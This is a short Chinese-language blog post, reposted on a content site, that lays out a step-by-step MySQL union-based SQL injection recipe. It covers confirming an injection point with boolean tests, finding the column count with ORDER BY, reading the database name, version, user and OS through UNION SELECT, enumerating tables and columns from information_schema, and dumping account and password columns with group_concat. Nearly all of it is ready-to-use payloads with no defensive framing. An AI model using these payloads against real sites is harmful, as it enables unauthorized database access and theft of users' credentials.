美文网首页
SQL注入之MySQL注入

SQL注入之MySQL注入

作者: 冰与河豚鱼 | 来源:发表于2018-08-14 17:25 被阅读0次

1.判断注入
and 1=1 返回正常
and 1=2 返回不正常 存在注入点
或:or 1=1 返回不正常
or 1=2 返回正常 存在注入点

2.判断字段长度
order by xx
order by 21 正常
order by 22 不正常
说明长度为21

3.报错
http://... ?id=5 UNION SELECT 1,2,3,4,5,6,8...(字段长度) from information_schema.tables
(id=-5 前面加负号)
然后再报错的数字上加一些函数,然后报一些信息。

4.报基本信息
database() 数据库名
version() 数据库版本
user() 数据库用户
@@version_compile_os 操作系统
例如:UNION SELECT 1,user(),3,4,5...(字段长度)

5.找用户表名
union select 1,group_concat(table_name),3,4,...(字段长度) from information_schema.tables where table_schema=数据库名称转化的16进制数

6.找用户表中列名
union select 1,group_concat(column_name),3,4,...(字段长度) from information_schema.columns where table_name=表名转化的16进制数
(拿到之后,查看源代码取出列名)

7.拿账号密码
union select 1,group_concat(账号列名,0x5c,密码列名),3,4,...(字段长度) from 用户表名

相关文章

  • 小迪16期-20170226

    第二天:Sql注入集锦篇 1.Sql注入之access注入 2.Sql注入之mysql注入 3.Sql注入之mss...

  • SQL注入之MySQL注入

    1.判断注入and 1=1 返回正常and 1=2 返回不正常 存在注入点或:or 1=1 返回不正常or 1=2...

  • SQL注入漏洞案例实践学习记录(2018.7-2018.8)

    一、SQL注入简述 SQL注入漏洞测试的方式总结 SQL注入常用的内置函数整理(以MySql为例) 二、测试环境&...

  • PHP代码安全之SQL注入

    PHP代码安全之SQL注入 1、什么是SQL注入? SQL攻击(英语:SQL injection),简称注入攻击,...

  • 堆叠注入

    SQL注入之堆叠注入 之前一直以为堆叠注入不适合mysql数据库,实战中也没有尝试过堆叠注入,今天看书《web安全...

  • web安全之SQL注入

    2018/07/06 23:41 慕课网web安全之SQ之注入课程学习笔记 什么是SQL注入? 如何寻找SQL注入...

  • web常见漏洞的成因和修复

    1.SQL注入 漏洞描述:SQL 注入攻击( SQL Injection ),简称注入攻击、SQL 注入,主要用于...

  • web训练sql注入中级练习-墨者学堂

    sql注入实战mysql(进阶版) 看这个是base64编码 手工注入注入不出来。。。 使用sqlmap跑提示使用...

  • sqlmap使用

    环境准备: 假设存在sql注入的url是 一、基于mysql注入 a、sqlmap注入爆数据库 如下图显示,即爆出...

  • DVWA之“SQL注入”

    漏洞类型:SQL注入/Get 字符型 安全级别:Low 目标:通过注入SQL语句,获取 MySql 数据库存放的用...

网友评论

      本文标题:SQL注入之MySQL注入

      本文链接:https://www.haomeiwen.com/subject/hjuvbftx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|SQL注入之MySQL注入|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!